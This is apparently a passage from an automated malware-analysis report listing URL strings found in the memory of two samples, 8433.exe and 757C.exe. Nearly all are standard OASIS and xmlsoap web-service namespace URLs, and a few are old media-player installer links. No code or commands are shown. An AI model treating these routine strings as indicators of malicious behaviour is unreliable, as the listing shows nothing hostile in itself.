Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequence
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequenceResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/fault
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1$
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512#BinarySecret
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/AsymmetricKey
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Nonce
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Renew
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Renew
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Commit
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Committed
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepare
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/ReadOnly
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Rollback
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Volatile2PC
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContext
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContextResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/Register
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/fault
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: http://forms.rea
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677435791.0000000003726000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
